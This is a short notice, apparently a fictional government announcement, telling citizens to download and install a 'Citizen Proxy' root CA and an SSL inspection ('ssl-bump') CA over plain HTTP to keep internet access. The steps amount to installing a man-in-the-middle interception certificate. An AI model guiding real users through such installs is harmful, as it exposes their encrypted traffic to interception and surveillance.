Citizen Proxy Certificate Update Required

The NDRC Root CA certificate used by the Citizen Proxy has been renewed. All citizens must update their device certificates before the expiry date to maintain internet access.

What you need to do

  1. Visit http://proxy.citizen.gov.ndrc.uk/ndrc-root-ca.crt from each registered device
  2. Download and install the updated root certificate
  3. Download and install the updated SSL inspection certificate from http://proxy.citizen.gov.ndrc.uk/ndrc-ssl-bump-ca.crt
  4. Restart your web browser
  5. Verify access by visiting the Digital Compliance Check page

After the expiry date, devices with outdated certificates will be unable to access any NDRC services through the Citizen Proxy. This is a security requirement and cannot be waived.
